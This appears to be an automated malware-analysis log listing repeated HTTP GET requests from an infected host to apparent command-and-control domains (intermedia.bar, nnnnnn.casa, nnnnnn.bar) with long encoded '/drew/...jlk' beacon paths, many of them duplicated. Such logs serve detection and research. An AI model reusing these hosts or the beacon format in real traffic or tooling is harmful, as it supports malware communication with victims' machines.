Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.casaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.casaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.casaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.casaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.casa
Source: global traffic	HTTP traffic detected: GET /drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7CusLE4kewLdgn0o2N/oqWX0BcSxplHN_2B/LanESZOKp7dQPeh/Bo8uTaavu_2Ft_2Fbr/wQ7_2Bk2J/05dRSkDLS9N7xl3W_2Bf/AbGuWE5_2Fe2HMgSOVJ/9yz_2BMUIlCumYQTU9_2FK/3J_2FJB7d5R8b/4SQYH3gS/rRcCSRSB5b0qKURrLfmKh6H/GM_2F3Wo_2/F.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: nnnnnn.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.bar
Source: global traffic	HTTP traffic detected: GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.nnnnnn.bar
